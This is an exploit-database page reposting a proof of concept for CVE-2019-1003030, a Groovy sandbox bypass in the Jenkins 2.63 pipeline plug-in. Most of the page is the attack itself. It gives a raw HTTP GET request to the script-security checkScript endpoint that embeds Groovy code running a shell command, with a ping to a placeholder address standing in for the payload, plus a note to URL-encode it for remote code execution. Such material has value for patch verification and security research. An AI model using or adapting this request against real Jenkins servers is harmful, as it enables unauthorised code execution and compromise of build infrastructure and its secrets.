Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Jenkins 2.63 Sandbox Bypass
# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
# Date: 8th October 2020
# Exploit Author: dmw0ng
# Vendor Homepage:
# Software Link:
# Version: Jenkins 2.63
# Tested on: Ubuntu 18.04 / 20.04
# CVE : CVE-2019-1003030

GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
  public x(){
"ping -c 1 xx.xx.xx.xx".execute()
} HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
Connection: close
Upgrade-Insecure-Requests: 1

URL Encoding the following for RCE
```public class x {
  public x(){
"ping -c 1 xx.xx.xx.xx".execute()
} ```



Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.